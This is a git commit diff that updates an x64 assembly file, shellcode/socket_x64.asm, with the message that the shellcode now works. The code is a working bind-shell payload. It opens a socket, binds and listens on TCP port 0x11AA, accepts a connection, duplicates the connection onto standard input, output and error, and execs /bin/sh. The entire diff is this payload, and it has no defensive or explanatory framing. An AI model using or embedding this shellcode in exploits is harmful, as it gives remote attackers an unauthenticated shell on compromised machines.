diff options
| author | toni <matzeton@googlemail.com> | 2014-11-18 17:19:31 +0100 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2014-11-18 17:19:31 +0100 |
| commit | 5c26ae8af99016bcbb6fae633367ab7100521c6d (patch) | |
| tree | 8623e19229c2ee8dac460bd658456719a2a0de99 /shellcode/socket_x64.asm | |
| parent | 8c116d25fd1351f1b896584629b9d388446fc544 (diff) | |
- socket_x64 shellcode works
Diffstat (limited to 'shellcode/socket_x64.asm')
| -rw-r--r-- | shellcode/socket_x64.asm | 43 |
1 files changed, 22 insertions, 21 deletions
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm index 131fefa..1ec36b0 100644 --- a/shellcode/socket_x64.asm +++ b/shellcode/socket_x64.asm @@ -8,66 +8,67 @@ xor rdx,rdx mov dil,0x2 ; AF_INET mov sil,0x1 ; SOCK_STREAM mov al,0x29 ; socket() syscall -int 0x80 ; let the kernel do the stuff +syscall mov rdi,rax ; save sockfd (used as argument for future calls) ; bind() xor rax,rax -xor rdi,rdi -xor rsi,rsi push rax ; sockaddr_in: in_addr = 0 push word 0x11AA ; sockaddr_in: tcp port push word 0x2 ; sockaddr_in: sa_family = AF_INET mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in) -mov rdx,0x10 ; addrlen +mov dl,0x10 ; addrlen mov al,0x31 ; bind() syscall -int 0x80 ; kernel mode +syscall ; listen() xor rax,rax xor rsi,rsi ; zero rsi (arg2 -> backlog) mov al,0x32 ; listen() syscall -int 0x80 +syscall ; accept() xor rax,rax push rax ; sockaddr_in: in_addr = 0 -push word ax ; sockaddr_in: tcp_port = 0 +push word 0x11AA ; sockaddr_in: tcp_port = 0 push word 0x2 ; sockaddr_in: sa_family = AF_INET mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in) +push 0x10 ; addr_len +mov rdx,rsp ; pointer to upeer_addrlen mov al,0x2B ; accept() syscall -int 0x80 +syscall + +mov rdi,rax ; save clientfd ; dup2() -xor rcx,rcx -mov cl,0x3 ; loop count +xor rdx,rdx +mov dl,0x3 dupes: -xor rsi,rsi -dec cl ; loop var -mov rsi,rcx ; loop var -> newfd +mov rsi,rdx +dec rsi xor rax,rax -mov al,0x21 ; dup2() syscall -int 0x80 -inc cl -loop dupes +mov al,0x21 +syscall +dec dl +jnz dupes ; exec mov rax,0x68732f6e69622f2f ; string 'hs/nib//' push rax ; push the string onto the stack -mov rdi,rsp ; arg1 = pointer to string xor rax,rax +mov byte [rsp + 8],al ; null-terminate the string +mov rdi,rsp ; arg1 = pointer to string push rax ; arg2 = null mov rsi,rsp push rax ; arg3 = null mov rdx,rsp -mov byte [esp + 8],al ; null-terminate the string mov al,0x3b ; exec() syscall -int 0x80 +syscall ; exit() xor rax,rax xor rdi,rdi mov dil,0x42 ; return code (66d) mov al,0x3c ; exit() syscall -int 0x80 +syscall |